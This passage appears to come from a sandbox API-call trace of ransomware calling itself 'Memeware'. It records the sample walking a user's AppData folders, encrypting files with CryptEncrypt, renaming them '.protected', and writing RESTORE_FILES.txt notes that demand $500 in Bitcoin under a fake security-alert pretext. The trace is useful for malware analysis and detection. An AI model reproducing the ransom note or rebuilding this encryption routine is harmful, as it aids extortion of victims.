pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 108 [0089.825] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0089.825] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0089.825] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned 110 [0089.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.828] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.828] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.828] lstrcmpiW 
(lpString1=".", lpString2="System Volume Information") returned -1 [0089.828] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.") returned 110 [0089.828] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.828] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.828] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.829] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.829] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.829] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\..") returned 111 [0089.829] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.829] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Program Files") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="Program Files (x86)") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="$Recycle.bin") returned 1 [0089.829] lstrcmpiW (lpString1="sys", lpString2="System Volume Information") returned -1 [0089.829] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 112 [0089.829] 
lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0089.829] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0089.829] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned 114 [0089.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0089.829] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.829] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.") returned 114 [0089.830] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.830] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.830] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash 
Player\\macromedia.com\\support\\flashplayer\\sys\\..") returned 115 [0089.830] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.830] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.830] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Windows") returned -1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Program Files") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="Program Files (x86)") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="$Recycle.bin") returned 1 [0089.830] lstrcmpiW (lpString1="settings.sol", lpString2="System Volume Information") returned -1 [0089.830] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.830] StrStrIW (lpFirst="settings.sol", lpSrch=".protected") returned 0x0 [0089.830] lstrcmpW (lpString1="settings.sol", lpString2="RESTORE_FILES.txt") returned 1 [0089.830] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0089.830] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0089.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.831] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.831] StrStrW (lpFirst="settings.sol", lpSrch=".txt") returned 0x0 [0089.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.832] StrStrW (lpFirst="settings.sol", lpSrch=".rar") returned 0x0 [0089.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 125 [0089.832] StrStrW (lpFirst="settings.sol", lpSrch=".zip") returned 0x0 [0089.832] ReadFile (in: hFile=0x15c, lpBuffer=0xce0048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesRead=0x295e064*=0x1d6, lpOverlapped=0x0) returned 1 [0089.833] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0xce0048*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesWritten=0x295e064*=0x1d6, lpOverlapped=0x0) returned 1 [0089.833] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0089.833] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 
1 [0089.834] CloseHandle (hObject=0x15c) returned 1 [0089.834] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected") returned 135 [0089.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.protected")) returned 1 [0089.835] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0089.835] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0089.835] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\RESTORE_FILES.txt") returned 130 [0089.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.835] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.835] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0089.836] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.836] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0089.836] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.836] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0089.836] CloseHandle (hObject=0x158) returned 1 [0089.838] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.838] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.838] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\RESTORE_FILES.txt") returned 126 [0089.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.838] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.838] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.839] lstrlenA (lpString="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") returned 684 [0089.839] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.839] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.839] CloseHandle (hObject=0x154) returned 1 [0089.839] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.839] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.840] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RESTORE_FILES.txt") returned 114 [0089.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.840] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.840] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.841] lstrlenA (lpString="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") returned 684 [0089.841] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.841] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.841] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.841] CloseHandle (hObject=0x150) returned 1 [0089.841] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.841] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.841] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RESTORE_FILES.txt") returned 106 [0089.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.842] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.842] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.843] lstrlenA (lpString="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") returned 684 [0089.843] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.843] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.843] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.843] CloseHandle (hObject=0x14c) returned 1 [0089.844] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.844] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.844] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RESTORE_FILES.txt") returned 91 [0089.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.863] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.864] lstrlenA (lpString="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") returned 684 [0089.864] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.864] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: 